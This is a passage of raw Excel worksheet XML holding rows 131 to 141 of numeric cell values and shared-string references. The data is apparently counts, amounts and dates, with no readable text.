        <v>1176</v>
      </c>
      <c r="C131" t="s">
        <v>168</v>
      </c>
      <c r="D131" t="s">
        <v>1177</v>
      </c>
      <c r="E131" t="s">
        <v>142</v>
      </c>
      <c r="F131" t="s">
        <v>1178</v>
      </c>
      <c r="G131" s="1">
        <v>44165</v>
      </c>
      <c r="H131">
        <v>3439</v>
      </c>
      <c r="I131">
        <v>3439</v>
      </c>
      <c r="J131">
        <v>1</v>
      </c>
      <c r="K131">
        <v>0</v>
      </c>
      <c r="L131">
        <v>1</v>
      </c>
      <c r="M131">
        <v>0</v>
      </c>
      <c r="N131">
        <v>0</v>
      </c>
      <c r="O131">
        <v>0</v>
      </c>
      <c r="P131">
        <v>0</v>
      </c>
      <c r="Q131">
        <v>1</v>
      </c>
      <c r="R131">
        <v>2</v>
      </c>
      <c r="S131">
        <v>1</v>
      </c>
      <c r="T131">
        <v>2</v>
      </c>
      <c r="U131">
        <v>15000</v>
      </c>
      <c r="V131">
        <v>0</v>
      </c>
      <c r="W131">
        <v>1000</v>
      </c>
      <c r="X131">
        <v>0</v>
      </c>
      <c r="Y131">
        <v>0</v>
      </c>
      <c r="Z131">
        <v>0</v>
      </c>
      <c r="AA131">
        <v>0</v>
      </c>
      <c r="AB131">
        <v>200</v>
      </c>
      <c r="AC131">
        <v>16000</v>
      </c>
      <c r="AD131">
        <v>1</v>
      </c>
      <c r="AE131">
        <v>1000</v>
      </c>
      <c r="AF131" t="s">
        <v>1179</v>
      </c>
      <c r="AG131">
        <v>17530</v>
      </c>
      <c r="AH131">
        <v>13</v>
      </c>
      <c r="AJ131">
        <v>176</v>
      </c>
      <c r="AK131" t="s">
        <v>1180</v>
      </c>
      <c r="AL131" t="s">
        <v>1181</v>
      </c>
      <c r="AM131" t="s">
        <v>1182</v>
      </c>
      <c r="AN131" t="s">
        <v>55</v>
      </c>
      <c r="AO131">
        <v>2014</v>
      </c>
      <c r="AP131" t="s">
        <v>1183</v>
      </c>
      <c r="AQ131">
        <v>218991551</v>
      </c>
      <c r="AR131" t="s">
        <v>1184</v>
      </c>
      <c r="AS131" t="s">
        <v>71</v>
      </c>
      <c r="AT131" t="s">
        <v>58</v>
      </c>
      <c r="AU131">
        <v>62</v>
      </c>
      <c r="AV131">
        <v>1</v>
      </c>
      <c r="AW131">
        <v>14</v>
      </c>
      <c r="AX131">
        <v>7</v>
      </c>
      <c r="AY131">
        <v>11</v>
      </c>
      <c r="AZ131">
        <v>4</v>
      </c>
      <c r="BA131" t="s">
        <v>17335</v>
      </c>
      <c r="BB131" t="s">
        <v>14617</v>
      </c>
      <c r="BC131" t="s">
        <v>10885</v>
      </c>
      <c r="BD131" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="132" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>518</v>
      </c>
      <c r="B132" t="s">
        <v>1185</v>
      </c>
      <c r="C132" t="s">
        <v>157</v>
      </c>
      <c r="D132" t="s">
        <v>1186</v>
      </c>
      <c r="E132" t="s">
        <v>242</v>
      </c>
      <c r="F132" t="s">
        <v>1187</v>
      </c>
      <c r="G132" s="1">
        <v>44095</v>
      </c>
      <c r="H132">
        <v>3447</v>
      </c>
      <c r="I132">
        <v>3447</v>
      </c>
      <c r="J132">
        <v>3</v>
      </c>
      <c r="K132">
        <v>0</v>
      </c>
      <c r="L132">
        <v>1</v>
      </c>
      <c r="M132">
        <v>0</v>
      </c>
      <c r="N132">
        <v>0</v>
      </c>
      <c r="O132">
        <v>0</v>
      </c>
      <c r="P132">
        <v>16</v>
      </c>
      <c r="Q132">
        <v>10</v>
      </c>
      <c r="R132">
        <v>4</v>
      </c>
      <c r="S132">
        <v>22</v>
      </c>
      <c r="T132">
        <v>1</v>
      </c>
      <c r="U132">
        <v>700000</v>
      </c>
      <c r="V132">
        <v>0</v>
      </c>
      <c r="W132">
        <v>3000</v>
      </c>
      <c r="X132">
        <v>0</v>
      </c>
      <c r="Y132">
        <v>0</v>
      </c>
      <c r="Z132">
        <v>0</v>
      </c>
      <c r="AA132">
        <v>95000</v>
      </c>
      <c r="AB132">
        <v>3000</v>
      </c>
      <c r="AC132">
        <v>10000</v>
      </c>
      <c r="AD132">
        <v>95000</v>
      </c>
      <c r="AE132">
        <v>3750000</v>
      </c>
      <c r="AF132" t="s">
        <v>1188</v>
      </c>
      <c r="AG132">
        <v>67172</v>
      </c>
      <c r="AH132">
        <v>16</v>
      </c>
      <c r="AJ132">
        <v>241</v>
      </c>
      <c r="AK132" t="s">
        <v>1189</v>
      </c>
      <c r="AL132" t="s">
        <v>1190</v>
      </c>
      <c r="AM132" t="s">
        <v>1191</v>
      </c>
      <c r="AN132" t="s">
        <v>82</v>
      </c>
      <c r="AO132">
        <v>2000</v>
      </c>
      <c r="AP132" t="s">
        <v>1192</v>
      </c>
      <c r="AQ132" t="s">
        <v>1193</v>
      </c>
      <c r="AR132" t="s">
        <v>1188</v>
      </c>
      <c r="AS132" t="s">
        <v>71</v>
      </c>
      <c r="AT132" t="s">
        <v>86</v>
      </c>
      <c r="AU132">
        <v>21</v>
      </c>
      <c r="AV132">
        <v>1</v>
      </c>
      <c r="AW132">
        <v>0</v>
      </c>
      <c r="AX132">
        <v>140</v>
      </c>
      <c r="AY132">
        <v>70</v>
      </c>
      <c r="AZ132">
        <v>38</v>
      </c>
      <c r="BA132" t="s">
        <v>17339</v>
      </c>
      <c r="BB132" t="s">
        <v>14636</v>
      </c>
      <c r="BC132">
        <v>0</v>
      </c>
      <c r="BD132" t="s">
        <v>10957</v>
      </c>
    </row>
    <row r="133" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>779</v>
      </c>
      <c r="B133" t="s">
        <v>1194</v>
      </c>
      <c r="C133" t="s">
        <v>129</v>
      </c>
      <c r="D133" t="s">
        <v>1195</v>
      </c>
      <c r="E133" t="s">
        <v>1196</v>
      </c>
      <c r="F133" t="s">
        <v>1197</v>
      </c>
      <c r="G133" s="1">
        <v>44183</v>
      </c>
      <c r="H133">
        <v>3490</v>
      </c>
      <c r="I133">
        <v>3490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t="s">
        <v>1198</v>
      </c>
      <c r="AG133">
        <v>15710</v>
      </c>
      <c r="AH133">
        <v>11</v>
      </c>
      <c r="AJ133">
        <v>268</v>
      </c>
      <c r="AK133" t="s">
        <v>829</v>
      </c>
      <c r="AL133" t="s">
        <v>1199</v>
      </c>
      <c r="AM133" t="s">
        <v>1200</v>
      </c>
      <c r="AN133" t="s">
        <v>55</v>
      </c>
      <c r="AO133">
        <v>1989</v>
      </c>
      <c r="AP133" t="s">
        <v>1201</v>
      </c>
      <c r="AQ133" t="s">
        <v>1202</v>
      </c>
      <c r="AR133" t="s">
        <v>1203</v>
      </c>
      <c r="AS133" t="s">
        <v>71</v>
      </c>
      <c r="AT133" t="s">
        <v>58</v>
      </c>
      <c r="AU133">
        <v>5</v>
      </c>
      <c r="AV133">
        <v>1</v>
      </c>
      <c r="AW133">
        <v>0</v>
      </c>
      <c r="AX133">
        <v>0</v>
      </c>
      <c r="AY133">
        <v>7</v>
      </c>
      <c r="AZ133">
        <v>3</v>
      </c>
      <c r="BA133" t="s">
        <v>17338</v>
      </c>
      <c r="BB133" t="s">
        <v>14850</v>
      </c>
      <c r="BC133">
        <v>0</v>
      </c>
      <c r="BD133" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="134" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>794</v>
      </c>
      <c r="B134" t="s">
        <v>1204</v>
      </c>
      <c r="C134" t="s">
        <v>726</v>
      </c>
      <c r="D134" t="s">
        <v>1205</v>
      </c>
      <c r="E134" t="s">
        <v>1206</v>
      </c>
      <c r="F134" t="s">
        <v>1207</v>
      </c>
      <c r="G134" s="1">
        <v>43949</v>
      </c>
      <c r="H134">
        <v>3511</v>
      </c>
      <c r="I134">
        <v>3511</v>
      </c>
      <c r="J134">
        <v>0</v>
      </c>
      <c r="K134">
        <v>2</v>
      </c>
      <c r="L134">
        <v>0</v>
      </c>
      <c r="M134">
        <v>0</v>
      </c>
      <c r="N134">
        <v>0</v>
      </c>
      <c r="O134">
        <v>0</v>
      </c>
      <c r="P134">
        <v>0</v>
      </c>
      <c r="Q134">
        <v>0</v>
      </c>
      <c r="R134">
        <v>0</v>
      </c>
      <c r="S134">
        <v>0</v>
      </c>
      <c r="T134">
        <v>0</v>
      </c>
      <c r="U134">
        <v>0</v>
      </c>
      <c r="V134">
        <v>40</v>
      </c>
      <c r="W134">
        <v>0</v>
      </c>
      <c r="X134">
        <v>0</v>
      </c>
      <c r="Y134">
        <v>0</v>
      </c>
      <c r="Z134">
        <v>0</v>
      </c>
      <c r="AA134">
        <v>0</v>
      </c>
      <c r="AB134">
        <v>0</v>
      </c>
      <c r="AC134">
        <v>0</v>
      </c>
      <c r="AD134">
        <v>0</v>
      </c>
      <c r="AE134">
        <v>0</v>
      </c>
      <c r="AF134" t="s">
        <v>1208</v>
      </c>
      <c r="AG134">
        <v>97762</v>
      </c>
      <c r="AH134">
        <v>32</v>
      </c>
      <c r="AJ134">
        <v>467</v>
      </c>
      <c r="AK134" t="s">
        <v>1209</v>
      </c>
      <c r="AL134" t="s">
        <v>1210</v>
      </c>
      <c r="AM134" t="s">
        <v>1211</v>
      </c>
      <c r="AN134" t="s">
        <v>55</v>
      </c>
      <c r="AO134">
        <v>2015</v>
      </c>
      <c r="AP134">
        <v>85299091488</v>
      </c>
      <c r="AQ134" t="s">
        <v>1212</v>
      </c>
      <c r="AR134" t="s">
        <v>1208</v>
      </c>
      <c r="AS134" t="s">
        <v>71</v>
      </c>
      <c r="AT134" t="s">
        <v>58</v>
      </c>
      <c r="AU134">
        <v>26</v>
      </c>
      <c r="AV134">
        <v>2</v>
      </c>
      <c r="AW134">
        <v>25</v>
      </c>
      <c r="AX134">
        <v>32</v>
      </c>
      <c r="AY134">
        <v>3</v>
      </c>
      <c r="AZ134">
        <v>3</v>
      </c>
      <c r="BA134" t="s">
        <v>17341</v>
      </c>
      <c r="BB134" t="s">
        <v>14860</v>
      </c>
      <c r="BC134">
        <v>0</v>
      </c>
      <c r="BD134" t="s">
        <v>10630</v>
      </c>
    </row>
    <row r="135" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>286</v>
      </c>
      <c r="B135" t="s">
        <v>1213</v>
      </c>
      <c r="C135" t="s">
        <v>157</v>
      </c>
      <c r="D135" t="s">
        <v>1214</v>
      </c>
      <c r="E135" t="s">
        <v>1215</v>
      </c>
      <c r="F135" t="s">
        <v>1216</v>
      </c>
      <c r="G135" s="1">
        <v>43987</v>
      </c>
      <c r="H135">
        <v>3570</v>
      </c>
      <c r="I135">
        <v>3570</v>
      </c>
      <c r="J135">
        <v>3</v>
      </c>
      <c r="K135">
        <v>2</v>
      </c>
      <c r="L135">
        <v>6</v>
      </c>
      <c r="M135">
        <v>6</v>
      </c>
      <c r="N135">
        <v>0</v>
      </c>
      <c r="O135">
        <v>0</v>
      </c>
      <c r="P135">
        <v>0</v>
      </c>
      <c r="Q135">
        <v>0</v>
      </c>
      <c r="R135">
        <v>0</v>
      </c>
      <c r="S135">
        <v>0</v>
      </c>
      <c r="T135">
        <v>2</v>
      </c>
      <c r="U135">
        <v>300000</v>
      </c>
      <c r="V135">
        <v>20000</v>
      </c>
      <c r="W135">
        <v>15000</v>
      </c>
      <c r="X135">
        <v>9000</v>
      </c>
      <c r="Y135">
        <v>0</v>
      </c>
      <c r="Z135">
        <v>0</v>
      </c>
      <c r="AA135">
        <v>0</v>
      </c>
      <c r="AB135">
        <v>0</v>
      </c>
      <c r="AC135">
        <v>0</v>
      </c>
      <c r="AD135">
        <v>0</v>
      </c>
      <c r="AE135">
        <v>100000</v>
      </c>
      <c r="AF135" t="s">
        <v>1217</v>
      </c>
      <c r="AG135">
        <v>62264</v>
      </c>
      <c r="AH135">
        <v>16</v>
      </c>
      <c r="AJ135">
        <v>251</v>
      </c>
      <c r="AK135" t="s">
        <v>415</v>
      </c>
      <c r="AL135" t="s">
        <v>1218</v>
      </c>
      <c r="AM135" t="s">
        <v>1219</v>
      </c>
      <c r="AN135" t="s">
        <v>55</v>
      </c>
      <c r="AO135">
        <v>2009</v>
      </c>
      <c r="AP135">
        <v>322666463</v>
      </c>
      <c r="AQ135">
        <v>87752289802</v>
      </c>
      <c r="AR135" t="s">
        <v>1220</v>
      </c>
      <c r="AS135" t="s">
        <v>71</v>
      </c>
      <c r="AT135" t="s">
        <v>58</v>
      </c>
      <c r="AU135">
        <v>30</v>
      </c>
      <c r="AV135">
        <v>3</v>
      </c>
      <c r="AW135">
        <v>110</v>
      </c>
      <c r="AX135">
        <v>177</v>
      </c>
      <c r="AY135">
        <v>20</v>
      </c>
      <c r="AZ135">
        <v>5</v>
      </c>
      <c r="BA135" t="s">
        <v>16657</v>
      </c>
      <c r="BB135" t="s">
        <v>14455</v>
      </c>
      <c r="BC135" t="s">
        <v>9536</v>
      </c>
      <c r="BD135" t="s">
        <v>10663</v>
      </c>
    </row>
    <row r="136" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>671</v>
      </c>
      <c r="B136" t="s">
        <v>1221</v>
      </c>
      <c r="C136" t="s">
        <v>318</v>
      </c>
      <c r="D136" t="s">
        <v>1222</v>
      </c>
      <c r="E136" t="s">
        <v>111</v>
      </c>
      <c r="F136" t="s">
        <v>1223</v>
      </c>
      <c r="G136" s="1">
        <v>44048</v>
      </c>
      <c r="H136">
        <v>3584</v>
      </c>
      <c r="I136">
        <v>3584</v>
      </c>
      <c r="J136">
        <v>1</v>
      </c>
      <c r="K136">
        <v>1</v>
      </c>
      <c r="L136">
        <v>1</v>
      </c>
      <c r="M136">
        <v>0</v>
      </c>
      <c r="N136">
        <v>0</v>
      </c>
      <c r="O136">
        <v>1</v>
      </c>
      <c r="P136">
        <v>0</v>
      </c>
      <c r="Q136">
        <v>3</v>
      </c>
      <c r="R136">
        <v>0</v>
      </c>
      <c r="S136">
        <v>1</v>
      </c>
      <c r="T136">
        <v>1</v>
      </c>
      <c r="U136">
        <v>50000</v>
      </c>
      <c r="V136">
        <v>1</v>
      </c>
      <c r="W136">
        <v>5000</v>
      </c>
      <c r="X136">
        <v>0</v>
      </c>
      <c r="Y136">
        <v>0</v>
      </c>
      <c r="Z136">
        <v>1</v>
      </c>
      <c r="AA136">
        <v>0</v>
      </c>
      <c r="AB136">
        <v>400</v>
      </c>
      <c r="AC136">
        <v>0</v>
      </c>
      <c r="AD136">
        <v>1</v>
      </c>
      <c r="AE136">
        <v>80000</v>
      </c>
      <c r="AF136" t="s">
        <v>1224</v>
      </c>
      <c r="AG136">
        <v>90241</v>
      </c>
      <c r="AH136">
        <v>26</v>
      </c>
      <c r="AJ136">
        <v>420</v>
      </c>
      <c r="AK136" t="s">
        <v>331</v>
      </c>
      <c r="AL136" t="s">
        <v>332</v>
      </c>
      <c r="AM136" t="s">
        <v>1225</v>
      </c>
      <c r="AN136" t="s">
        <v>55</v>
      </c>
      <c r="AO136">
        <v>2018</v>
      </c>
      <c r="AP136" t="s">
        <v>1226</v>
      </c>
      <c r="AQ136" t="s">
        <v>1227</v>
      </c>
      <c r="AR136" t="s">
        <v>1224</v>
      </c>
      <c r="AU136">
        <v>25</v>
      </c>
      <c r="AV136">
        <v>1</v>
      </c>
      <c r="AW136">
        <v>23</v>
      </c>
      <c r="AX136">
        <v>46</v>
      </c>
      <c r="AY136">
        <v>10</v>
      </c>
      <c r="AZ136">
        <v>9</v>
      </c>
      <c r="BA136" t="s">
        <v>17348</v>
      </c>
      <c r="BB136" t="s">
        <v>14765</v>
      </c>
      <c r="BC136">
        <v>0</v>
      </c>
      <c r="BD136" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="137" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>272</v>
      </c>
      <c r="B137" t="s">
        <v>942</v>
      </c>
      <c r="C137" t="s">
        <v>157</v>
      </c>
      <c r="D137" t="s">
        <v>1228</v>
      </c>
      <c r="E137" t="s">
        <v>62</v>
      </c>
      <c r="F137" t="s">
        <v>1229</v>
      </c>
      <c r="G137" s="1">
        <v>44175</v>
      </c>
      <c r="H137">
        <v>3605</v>
      </c>
      <c r="I137">
        <v>3605</v>
      </c>
      <c r="J137">
        <v>0</v>
      </c>
      <c r="K137">
        <v>2</v>
      </c>
      <c r="L137">
        <v>0</v>
      </c>
      <c r="M137">
        <v>0</v>
      </c>
      <c r="N137">
        <v>0</v>
      </c>
      <c r="O137">
        <v>0</v>
      </c>
      <c r="P137">
        <v>18</v>
      </c>
      <c r="Q137">
        <v>0</v>
      </c>
      <c r="R137">
        <v>0</v>
      </c>
      <c r="S137">
        <v>21</v>
      </c>
      <c r="T137">
        <v>3</v>
      </c>
      <c r="U137">
        <v>0</v>
      </c>
      <c r="V137">
        <v>3000000</v>
      </c>
      <c r="W137">
        <v>0</v>
      </c>
      <c r="X137">
        <v>0</v>
      </c>
      <c r="Y137">
        <v>0</v>
      </c>
      <c r="Z137">
        <v>0</v>
      </c>
      <c r="AA137">
        <v>294912</v>
      </c>
      <c r="AB137">
        <v>0</v>
      </c>
      <c r="AC137">
        <v>0</v>
      </c>
      <c r="AD137">
        <v>31680</v>
      </c>
      <c r="AE137">
        <v>47960000</v>
      </c>
      <c r="AF137" t="s">
        <v>1230</v>
      </c>
      <c r="AG137">
        <v>67155</v>
      </c>
      <c r="AH137">
        <v>16</v>
      </c>
      <c r="AJ137">
        <v>241</v>
      </c>
      <c r="AK137" t="s">
        <v>1231</v>
      </c>
      <c r="AL137" t="s">
        <v>1232</v>
      </c>
      <c r="AM137" t="s">
        <v>1233</v>
      </c>
      <c r="AN137" t="s">
        <v>82</v>
      </c>
      <c r="AO137">
        <v>1993</v>
      </c>
      <c r="AP137">
        <v>343851361</v>
      </c>
      <c r="AQ137" t="s">
        <v>1234</v>
      </c>
      <c r="AR137" t="s">
        <v>1235</v>
      </c>
      <c r="AS137" t="s">
        <v>71</v>
      </c>
      <c r="AT137" t="s">
        <v>86</v>
      </c>
      <c r="AU137">
        <v>45</v>
      </c>
      <c r="AV137">
        <v>2</v>
      </c>
      <c r="AW137">
        <v>349</v>
      </c>
      <c r="AX137">
        <v>502</v>
      </c>
      <c r="AY137">
        <v>1532</v>
      </c>
      <c r="AZ137">
        <v>3010</v>
      </c>
      <c r="BA137" t="s">
        <v>16652</v>
      </c>
      <c r="BB137" t="s">
        <v>14441</v>
      </c>
      <c r="BC137" t="s">
        <v>12363</v>
      </c>
      <c r="BD137" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="138" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>186</v>
      </c>
      <c r="B138" t="s">
        <v>1236</v>
      </c>
      <c r="C138" t="s">
        <v>99</v>
      </c>
      <c r="D138" t="s">
        <v>1237</v>
      </c>
      <c r="E138" t="s">
        <v>111</v>
      </c>
      <c r="F138" t="s">
        <v>1238</v>
      </c>
      <c r="G138" s="1">
        <v>43984</v>
      </c>
      <c r="H138">
        <v>3629</v>
      </c>
      <c r="I138">
        <v>3629</v>
      </c>
      <c r="J138">
        <v>4</v>
      </c>
      <c r="K138">
        <v>2</v>
      </c>
      <c r="L138">
        <v>3</v>
      </c>
      <c r="M138">
        <v>1</v>
      </c>
      <c r="N138">
        <v>0</v>
      </c>
      <c r="O138">
        <v>0</v>
      </c>
      <c r="P138">
        <v>0</v>
      </c>
      <c r="Q138">
        <v>0</v>
      </c>
      <c r="R138">
        <v>2</v>
      </c>
      <c r="S138">
        <v>0</v>
      </c>
      <c r="T138">
        <v>0</v>
      </c>
      <c r="U138">
        <v>990000</v>
      </c>
      <c r="V138">
        <v>12000</v>
      </c>
      <c r="W138">
        <v>12000</v>
      </c>
      <c r="X138">
        <v>2</v>
      </c>
      <c r="Y138">
        <v>0</v>
      </c>
      <c r="Z138">
        <v>0</v>
      </c>
      <c r="AA138">
        <v>0</v>
      </c>
      <c r="AB138">
        <v>0</v>
      </c>
      <c r="AC138">
        <v>20000</v>
      </c>
      <c r="AD138">
        <v>0</v>
      </c>
      <c r="AE138">
        <v>0</v>
      </c>
      <c r="AF138" t="s">
        <v>1239</v>
      </c>
      <c r="AG138">
        <v>14440</v>
      </c>
      <c r="AH138">
        <v>12</v>
      </c>
      <c r="AJ138">
        <v>160</v>
      </c>
      <c r="AK138" t="s">
        <v>114</v>
      </c>
      <c r="AL138" t="s">
        <v>114</v>
      </c>
      <c r="AM138" t="s">
        <v>1240</v>
      </c>
      <c r="AN138" t="s">
        <v>82</v>
      </c>
      <c r="AO138">
        <v>2015</v>
      </c>
      <c r="AP138" t="s">
        <v>1241</v>
      </c>
      <c r="AQ138">
        <v>85772642222</v>
      </c>
      <c r="AR138" t="s">
        <v>1242</v>
      </c>
      <c r="AS138" t="s">
        <v>71</v>
      </c>
      <c r="AT138" t="s">
        <v>86</v>
      </c>
      <c r="AU138">
        <v>25</v>
      </c>
      <c r="AV138">
        <v>0</v>
      </c>
      <c r="AW138">
        <v>10</v>
      </c>
      <c r="AX138">
        <v>7</v>
      </c>
      <c r="AY138">
        <v>85</v>
      </c>
      <c r="AZ138">
        <v>48</v>
      </c>
      <c r="BA138" t="s">
        <v>16633</v>
      </c>
      <c r="BB138" t="s">
        <v>14368</v>
      </c>
      <c r="BC138">
        <v>0</v>
      </c>
      <c r="BD138" t="s">
        <v>10977</v>
      </c>
    </row>
    <row r="139" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>473</v>
      </c>
      <c r="B139" t="s">
        <v>1243</v>
      </c>
      <c r="C139" t="s">
        <v>318</v>
      </c>
      <c r="D139" t="s">
        <v>1244</v>
      </c>
      <c r="E139" t="s">
        <v>1245</v>
      </c>
      <c r="F139" t="s">
        <v>1246</v>
      </c>
      <c r="G139" s="1">
        <v>44075</v>
      </c>
      <c r="H139">
        <v>3657</v>
      </c>
      <c r="I139">
        <v>3657</v>
      </c>
      <c r="J139">
        <v>0</v>
      </c>
      <c r="K139">
        <v>0</v>
      </c>
      <c r="L139">
        <v>0</v>
      </c>
      <c r="M139">
        <v>0</v>
      </c>
      <c r="N139">
        <v>0</v>
      </c>
      <c r="O139">
        <v>0</v>
      </c>
      <c r="P139">
        <v>0</v>
      </c>
      <c r="Q139">
        <v>1</v>
      </c>
      <c r="R139">
        <v>0</v>
      </c>
      <c r="S139">
        <v>0</v>
      </c>
      <c r="T139">
        <v>1</v>
      </c>
      <c r="U139">
        <v>0</v>
      </c>
      <c r="V139">
        <v>0</v>
      </c>
      <c r="W139">
        <v>0</v>
      </c>
      <c r="X139">
        <v>0</v>
      </c>
      <c r="Y139">
        <v>0</v>
      </c>
      <c r="Z139">
        <v>0</v>
      </c>
      <c r="AA139">
        <v>0</v>
      </c>
      <c r="AB139">
        <v>250</v>
      </c>
      <c r="AC139">
        <v>0</v>
      </c>
      <c r="AD139">
        <v>0</v>
      </c>
      <c r="AE139">
        <v>2000</v>
      </c>
      <c r="AF139" t="s">
        <v>1247</v>
      </c>
      <c r="AG139">
        <v>0</v>
      </c>
      <c r="AH139">
        <v>26</v>
      </c>
      <c r="AJ139">
        <v>420</v>
      </c>
      <c r="AK139" t="s">
        <v>331</v>
      </c>
      <c r="AL139" t="s">
        <v>1248</v>
      </c>
      <c r="AM139" t="s">
        <v>1249</v>
      </c>
      <c r="AN139" t="s">
        <v>55</v>
      </c>
      <c r="AO139">
        <v>2006</v>
      </c>
      <c r="AP139" t="s">
        <v>1250</v>
      </c>
      <c r="AQ139" t="s">
        <v>1251</v>
      </c>
      <c r="AR139" t="s">
        <v>1247</v>
      </c>
      <c r="AS139" t="s">
        <v>57</v>
      </c>
      <c r="AT139" t="s">
        <v>58</v>
      </c>
      <c r="AU139">
        <v>7</v>
      </c>
      <c r="AV139">
        <v>0</v>
      </c>
      <c r="AW139">
        <v>0</v>
      </c>
      <c r="AX139">
        <v>0</v>
      </c>
      <c r="AY139">
        <v>8</v>
      </c>
      <c r="AZ139">
        <v>2</v>
      </c>
      <c r="BA139" t="s">
        <v>17455</v>
      </c>
      <c r="BB139" t="s">
        <v>14604</v>
      </c>
      <c r="BC139">
        <v>0</v>
      </c>
      <c r="BD139" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="140" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>716</v>
      </c>
      <c r="B140" t="s">
        <v>1252</v>
      </c>
      <c r="C140" t="s">
        <v>47</v>
      </c>
      <c r="D140" t="s">
        <v>1253</v>
      </c>
      <c r="E140" t="s">
        <v>142</v>
      </c>
      <c r="F140" t="s">
        <v>1254</v>
      </c>
      <c r="G140" s="1">
        <v>44341</v>
      </c>
      <c r="H140">
        <v>3688</v>
      </c>
      <c r="I140">
        <v>3688</v>
      </c>
      <c r="J140">
        <v>3</v>
      </c>
      <c r="K140">
        <v>0</v>
      </c>
      <c r="L140">
        <v>1</v>
      </c>
      <c r="M140">
        <v>7</v>
      </c>
      <c r="N140">
        <v>0</v>
      </c>
      <c r="O140">
        <v>0</v>
      </c>
      <c r="P140">
        <v>0</v>
      </c>
      <c r="Q140">
        <v>0</v>
      </c>
      <c r="R140">
        <v>0</v>
      </c>
      <c r="S140">
        <v>1</v>
      </c>
      <c r="T140">
        <v>0</v>
      </c>
      <c r="U140">
        <v>1120000</v>
      </c>
      <c r="V140">
        <v>0</v>
      </c>
      <c r="W140">
        <v>8000</v>
      </c>
      <c r="X140">
        <v>300</v>
      </c>
      <c r="Y140">
        <v>0</v>
      </c>
      <c r="Z140">
        <v>0</v>
      </c>
      <c r="AA140">
        <v>0</v>
      </c>
      <c r="AB140">
        <v>0</v>
      </c>
      <c r="AC140">
        <v>0</v>
      </c>
      <c r="AD140">
        <v>1</v>
      </c>
      <c r="AE140">
        <v>0</v>
      </c>
      <c r="AF140" t="s">
        <v>497</v>
      </c>
      <c r="AG140">
        <v>20400</v>
      </c>
      <c r="AH140">
        <v>2</v>
      </c>
      <c r="AJ140">
        <v>53</v>
      </c>
      <c r="AK140" t="s">
        <v>1255</v>
      </c>
      <c r="AL140" t="s">
        <v>1256</v>
      </c>
      <c r="AM140" t="s">
        <v>1257</v>
      </c>
      <c r="AN140" t="s">
        <v>55</v>
      </c>
      <c r="AO140">
        <v>1998</v>
      </c>
      <c r="AP140" t="s">
        <v>1258</v>
      </c>
      <c r="AQ140" t="s">
        <v>1259</v>
      </c>
      <c r="AR140" t="s">
        <v>1260</v>
      </c>
      <c r="AS140" t="s">
        <v>71</v>
      </c>
      <c r="AT140" t="s">
        <v>58</v>
      </c>
      <c r="AU140">
        <v>26</v>
      </c>
      <c r="AV140">
        <v>1</v>
      </c>
      <c r="AW140">
        <v>14</v>
      </c>
      <c r="AX140">
        <v>7</v>
      </c>
      <c r="AY140">
        <v>19</v>
      </c>
      <c r="AZ140">
        <v>15</v>
      </c>
      <c r="BA140" t="s">
        <v>16746</v>
      </c>
      <c r="BB140" t="s">
        <v>14799</v>
      </c>
      <c r="BC140" t="s">
        <v>9603</v>
      </c>
      <c r="BD140" t="s">
        <v>11045</v>
      </c>
    </row>
    <row r="141" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>734</v>
      </c>
      <c r="B141" t="s">
        <v>1261</v>
      </c>
      <c r="C141" t="s">
        <v>47</v>
      </c>
      <c r="D141" t="s">
        <v>1262</v>
      </c>
      <c r="E141" t="s">
        <v>412</v>
      </c>
      <c r="F141" t="s">
        <v>1263</v>
      </c>
      <c r="G141" s="1">
        <v>44000</v>
      </c>
      <c r="H141">
        <v>3705</v>
      </c>
      <c r="I141">
        <v>3705</v>
      </c>
      <c r="J141">
        <v>0</v>
      </c>
      <c r="K141">
        <v>2</v>
      </c>
      <c r="L141">
        <v>1</v>
      </c>
      <c r="M141">
        <v>1</v>
      </c>
      <c r="N141">
        <v>0</v>
      </c>
      <c r="O141">
        <v>0</v>
      </c>
      <c r="P141">
        <v>0</v>
      </c>
      <c r="Q141">
        <v>5</v>
      </c>
      <c r="R141">
        <v>5</v>
      </c>
      <c r="S141">
        <v>0</v>
      </c>
      <c r="T141">
        <v>0</v>
      </c>
      <c r="U141">
        <v>0</v>
      </c>
      <c r="V141">
        <v>900000</v>
      </c>
      <c r="W141">
        <v>1500</v>
      </c>
      <c r="X141">
        <v>1500</v>
      </c>
      <c r="Y141">
        <v>0</v>
      </c>
      <c r="Z141">
        <v>0</v>
      </c>
      <c r="AA141">
        <v>0</v>
      </c>
      <c r="AB141">
        <v>5000</v>
      </c>
      <c r="AC141">
        <v>5000</v>
      </c>
      <c r="AD141">
        <v>0</v>
      </c>
      <c r="AE141">
        <v>0</v>
      </c>
      <c r="AF141" t="s">
        <v>1264</v>
      </c>
      <c r="AG141">
        <v>21352</v>
      </c>
      <c r="AH141">
        <v>2</v>
      </c>
      <c r="AJ141">
        <v>50</v>
      </c>
      <c r="AK141" t="s">
        <v>443</v>
      </c>
      <c r="AL141" t="s">
        <v>668</v>
      </c>
      <c r="AM141" t="s">
        <v>1265</v>
      </c>
      <c r="AN141" t="s">
        <v>55</v>
      </c>
      <c r="AO141">
        <v>2015</v>
      </c>
      <c r="AP141">
        <v>82365959595</v>
      </c>
      <c r="AQ141" t="s">
        <v>1266</v>
      </c>
      <c r="AR141" t="s">
        <v>1264</v>
      </c>
      <c r="AS141" t="s">
        <v>71</v>
      </c>
      <c r="AT141" t="s">
        <v>58</v>
      </c>
      <c r="AU141">
        <v>26</v>
      </c>
      <c r="AV141">
        <v>1</v>
      </c>
      <c r="AW141">
        <v>0</v>
      </c>
      <c r="AX141">
        <v>0</v>
      </c>
      <c r="AY141">
        <v>10</v>
      </c>
      <c r="AZ141">
        <v>4</v>
      </c>
      <c r="BA141" t="s">
